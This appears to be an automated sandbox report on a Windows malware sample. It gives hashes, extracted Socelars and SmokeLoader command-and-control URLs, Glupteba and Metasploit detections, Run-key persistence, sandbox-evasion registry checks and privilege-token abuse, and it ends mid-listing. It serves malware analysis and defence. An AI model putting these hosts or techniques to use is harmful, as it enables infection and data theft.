Analysis
-
max time kernel
152s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 20:28
Static task
static1
Behavioral task
behavioral1
Sample
4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
Resource
win10v2004-en-20220113
General
-
Target
4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
-
Size
8.1MB
-
MD5
7b943037183df91e5e8bd3ee835872a6
-
SHA1
99479cabfb6127ce3f1a47705c06ae9ce80bccce
-
SHA256
4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43
-
SHA512
d2e5d5d7ca17b2fe9382cf4d597dfbeef130ebb2ff7c8651ea6327b298fbe53ddceaece1e0131d3563940a5513d09355c000480f4ae211f46e5ed86a167323c0
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Signatures
-
Glupteba Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3816-142-0x0000000005280000-0x0000000005BA6000-memory.dmp family_glupteba behavioral2/memory/3816-162-0x0000000000400000-0x00000000030ED000-memory.dmp family_glupteba behavioral2/memory/1284-201-0x0000000005200000-0x0000000005B26000-memory.dmp family_glupteba behavioral2/memory/1284-202-0x0000000000400000-0x00000000030ED000-memory.dmp family_glupteba behavioral2/memory/5144-207-0x0000000000400000-0x00000000030ED000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3504 3288 rUNdlL32.eXe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 4916 created 3816 4916 svchost.exe Info.exe PID 4916 created 5144 4916 svchost.exe csrss.exe -
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
Processes:
Updbdate.exeInfo.exeFolder.exemd9_1sjm.exeInstall.exeFolder.exeFile.exepub2.exeWerFault.exeFiles.exeKRSetp.exejfiag3g_gg.exejfiag3g_gg.exeInfo.execsrss.exeinjector.exesHHgfnWbYrhYH15l5vk6FQMv.execwbgidupid process 2364 Updbdate.exe 3816 Info.exe 4892 Folder.exe 2060 md9_1sjm.exe 1468 Install.exe 3596 Folder.exe 1392 File.exe 4032 pub2.exe 4564 WerFault.exe 5060 Files.exe 1288 KRSetp.exe 3840 jfiag3g_gg.exe 1448 jfiag3g_gg.exe 1284 Info.exe 5144 csrss.exe 1676 injector.exe 2124 sHHgfnWbYrhYH15l5vk6FQMv.exe 5552 cwbgidu -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exeFolder.exeFile.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation File.exe -
Loads dropped DLL 1 IoCs
Processes:
WerFault.exepid process 936 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
Files.exeInfo.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MistyWave = "\"C:\\Windows\\rss\\csrss.exe\"" Info.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md9_1sjm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 154 ipinfo.io 157 api.db-ip.com 158 api.db-ip.com 17 ip-api.com 153 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jamesold.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\jamesold.exe autoit_exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\349e8308-6def-40db-ba45-1273618e3896.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220129011035.pma setup.exe -
Drops file in Windows directory 2 IoCs
Processes:
Info.exedescription ioc process File opened for modification C:\Windows\rss Info.exe File created C:\Windows\rss\csrss.exe Info.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1920 3816 WerFault.exe Info.exe 4836 3816 WerFault.exe Info.exe 3428 3816 WerFault.exe Info.exe 1292 936 WerFault.exe rundll32.exe 3608 3816 WerFault.exe Info.exe 3620 3816 WerFault.exe Info.exe 1152 3816 WerFault.exe Info.exe 5096 3816 WerFault.exe Info.exe 4564 3816 WerFault.exe Info.exe 1612 3816 WerFault.exe Info.exe 4840 3816 WerFault.exe Info.exe 3768 3816 WerFault.exe Info.exe 4192 3816 WerFault.exe Info.exe 5088 3816 WerFault.exe Info.exe 1336 3816 WerFault.exe Info.exe 2444 3816 WerFault.exe Info.exe 936 3816 WerFault.exe Info.exe 4408 3816 WerFault.exe Info.exe 4848 3816 WerFault.exe Info.exe 3284 3816 WerFault.exe Info.exe 1816 3816 WerFault.exe Info.exe 5012 3816 WerFault.exe Info.exe 2224 3816 WerFault.exe Info.exe 552 1284 WerFault.exe Info.exe 3640 1284 WerFault.exe Info.exe 5096 1284 WerFault.exe Info.exe 4052 1284 WerFault.exe Info.exe 4156 1284 WerFault.exe Info.exe 3448 1284 WerFault.exe Info.exe 4284 1284 WerFault.exe Info.exe 2484 1284 WerFault.exe Info.exe 1892 1284 WerFault.exe Info.exe 4596 1284 WerFault.exe Info.exe 2224 1284 WerFault.exe Info.exe 4424 1284 WerFault.exe Info.exe 1552 1284 WerFault.exe Info.exe 4276 1284 WerFault.exe Info.exe 3636 1284 WerFault.exe Info.exe 3496 1284 WerFault.exe Info.exe 4424 1284 WerFault.exe Info.exe 5704 5144 WerFault.exe csrss.exe 5752 5144 WerFault.exe csrss.exe 5796 5144 WerFault.exe csrss.exe 5888 5144 WerFault.exe csrss.exe 5920 5144 WerFault.exe csrss.exe 5992 5144 WerFault.exe csrss.exe 6052 5144 WerFault.exe csrss.exe 6096 5144 WerFault.exe csrss.exe 3284 5144 WerFault.exe csrss.exe 2124 5144 WerFault.exe csrss.exe 1720 5144 WerFault.exe csrss.exe 5200 5144 WerFault.exe csrss.exe 5268 5144 WerFault.exe csrss.exe 5356 5144 WerFault.exe csrss.exe 5424 5144 WerFault.exe csrss.exe 5524 5144 WerFault.exe csrss.exe 5608 5144 WerFault.exe csrss.exe 5848 5144 WerFault.exe csrss.exe 5904 5144 WerFault.exe csrss.exe 3292 5144 WerFault.exe csrss.exe 6004 5144 WerFault.exe csrss.exe 6100 5144 WerFault.exe csrss.exe 6028 5144 WerFault.exe csrss.exe 5172 5144 WerFault.exe csrss.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pub2.execwbgidudescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwbgidu Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwbgidu Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwbgidu -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4424 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
Info.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" Info.exe -
Modifies registry class 4 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exejfiag3g_gg.exepub2.exeInfo.exeInfo.exepid process 3580 msedge.exe 3580 msedge.exe 1380 msedge.exe 1380 msedge.exe 1448 jfiag3g_gg.exe 1448 jfiag3g_gg.exe 4032 pub2.exe 4032 pub2.exe 3816 Info.exe 3816 Info.exe 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 2712 1284 Info.exe 1284 Info.exe 2712 2712 2712 2712 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pub2.execwbgidupid process 4032 pub2.exe 5552 cwbgidu -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid process 1380 msedge.exe 1380 msedge.exe 1380 msedge.exe 1380 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Install.exeKRSetp.exeUpdbdate.exetaskkill.exemd9_1sjm.exeInfo.exesvchost.exedescription pid process Token: SeCreateTokenPrivilege 1468 Install.exe Token: SeAssignPrimaryTokenPrivilege 1468 Install.exe Token: SeLockMemoryPrivilege 1468 Install.exe Token: SeIncreaseQuotaPrivilege 1468 Install.exe Token: SeMachineAccountPrivilege 1468 Install.exe Token: SeTcbPrivilege 1468 Install.exe Token: SeSecurityPrivilege 1468 Install.exe Token: SeTakeOwnershipPrivilege 1468 Install.exe Token: SeLoadDriverPrivilege 1468 Install.exe Token: SeSystemProfilePrivilege 1468 Install.exe Token: SeSystemtimePrivilege 1468 Install.exe Token: SeProfSingleProcessPrivilege 1468 Install.exe Token: SeIncBasePriorityPrivilege 1468 Install.exe Token: SeCreatePagefilePrivilege 1468 Install.exe Token: SeCreatePermanentPrivilege 1468 Install.exe Token: SeBackupPrivilege 1468 Install.exe Token: SeRestorePrivilege 1468 Install.exe Token: SeShutdownPrivilege 1468 Install.exe Token: SeDebugPrivilege 1468 Install.exe Token: SeAuditPrivilege 1468 Install.exe Token: SeSystemEnvironmentPrivilege 1468 Install.exe Token: SeChangeNotifyPrivilege 1468 Install.exe Token: SeRemoteShutdownPrivilege 1468 Install.exe Token: SeUndockPrivilege 1468 Install.exe Token: SeSyncAgentPrivilege 1468 Install.exe Token: SeEnableDelegationPrivilege 1468 Install.exe Token: SeManageVolumePrivilege 1468 Install.exe Token: SeImpersonatePrivilege 1468 Install.exe Token: SeCreateGlobalPrivilege 1468 Install.exe Token: 31 1468 Install.exe Token: 32 1468 Install.exe Token: 33 1468 Install.exe Token: 34 1468 Install.exe Token: 35 1468 Install.exe Token: SeDebugPrivilege 1288 KRSetp.exe Token: SeDebugPrivilege 2364 Updbdate.exe Token: SeDebugPrivilege 4424 taskkill.exe Token: SeManageVolumePrivilege 2060 md9_1sjm.exe Token: SeManageVolumePrivilege 2060 md9_1sjm.exe Token: SeDebugPrivilege 3816 Info.exe Token: SeImpersonatePrivilege 3816 Info.exe Token: SeTcbPrivilege 4916 svchost.exe Token: SeTcbPrivilege 4916 svchost.exe Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeManageVolumePrivilege 2060 md9_1sjm.exe Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 Token: SeShutdownPrivilege 2712 Token: SeCreatePagefilePrivilege 2712 -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
WerFault.exemsedge.exepid process 4564 WerFault.exe 4564 WerFault.exe 4564 WerFault.exe 4564 WerFault.exe 4564 WerFault.exe 1380 msedge.exe 1380 msedge.exe 1380 msedge.exe 2712 2712 2712 2712 -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
WerFault.exepid process 4564 WerFault.exe 4564 WerFault.exe 4564 WerFault.exe 4564 WerFault.exe 4564 WerFault.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
File.exepid process 1392 File.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
